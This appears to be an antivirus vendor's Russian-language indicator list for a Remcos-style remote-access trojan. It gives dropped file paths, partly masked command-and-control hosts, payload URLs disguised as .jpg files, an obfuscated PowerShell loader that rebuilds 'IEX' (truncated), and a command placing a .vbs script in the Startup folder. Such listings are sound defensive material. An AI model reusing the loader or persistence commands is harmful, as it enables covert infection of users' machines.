Техническая информация
- %WINDIR%\microsoft.net\framework\v4.0.30319\regasm.exe
- %WINDIR%\microsoft.net\framework\v4.0.30319\regasm.exe
- %TEMP%\9e0c6c40-90ad-4f09-99e4-e87717944ae0\agiledotnetrt64.dll
- %APPDATA%\remcos\logs.dat
- '3.##9.18.57':80
- 'al######ade54321.ddns.net':8578
- http://3.##9.18.57/WQ2.jpg
- http://3.##9.18.57/WQ1.jpg
- DNS ASK google.com
- DNS ASK al######ade54321.ddns.net
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $t0='DE5'.replace('D','I').replace('5','x');sal g $t0;$gf=(00100100,01000101,01110010,01110010,01101111,01110010,01000001,01100011,01110100,01101001,01101111,01101110,01010000,01110010,01100101...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c move "<SYSTEM32>\<Имя файла>.vbs" "<SYSTEM32>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $t0='DE5'.replace('D','I').replace('5','x');sal g $t0;$gf=(00100100,01000101,01110010,01110010,01101111,01110010,01000001,01100011,01110100,01101001,01101111,01101110,01010000,01110010,01100101...
- '<SYSTEM32>\cmd.exe' /c move "<SYSTEM32>\<Имя файла>.vbs" "<SYSTEM32>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
- '%WINDIR%\microsoft.net\framework\v4.0.30319\regasm.exe'